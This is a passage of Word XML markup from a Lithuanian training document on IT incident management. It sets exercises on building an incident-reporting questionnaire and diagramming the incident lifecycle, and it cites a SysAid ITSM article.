          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidR="005C35A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sukurti incidentų fiksavimo</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C35A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">perdavimo </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">specialistui </w:t>
      </w:r>
      <w:r w:rsidR="005C35A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>anketą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04416D36" w14:textId="7AF617E4" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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 xml:space="preserve">UŽDUOTIS: </w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>udaryti anket</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(anket</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) šabloną incidentų </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>dentifikavimui ir pildymui</w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>fiksavimui</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Anketos paskirtis – perduoti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">informaciją apie </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>incident</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>specialistui /</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kitam reagavimo etapui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D076285" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5B611A" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA92C03" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ITSM Basics: A Simple Introduction to Incident Management (2015, sausio 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sysaid</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId127">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="480A5BD0" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521A6A3C" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="10181ACB"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2</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INCIDENTO GYVAVIMO CIKLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4A210" w14:textId="1B352CCA" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">veikos </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">schemą, kurioje </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atsispindėtų nuoseklus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>incident</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pašalinimo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ciklas (nuo</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> jo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>identifikavimo iki</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>galutinio</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">rezultatyvaus </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sprendimo)</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nurodykite </w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>incidento</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dalyvius ir jų</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ryši</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s, kai incidento ciklą sudaro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9F53D" w14:textId="096A77BA" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įvykių aptikimas ir registravimas</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271EC32" w14:textId="547FE220" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pradinė klasifikacija ir palaikymas</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677EF521" w14:textId="4912D15F" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jei reikia, persijungimas į svarbų incidentą</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EF153" w14:textId="71F70AFE" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugos prašymo proceso iškvietimas, jei ne incidentas</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCAAB5" w14:textId="2D6D982D" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tyrimas ir diagnozė</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
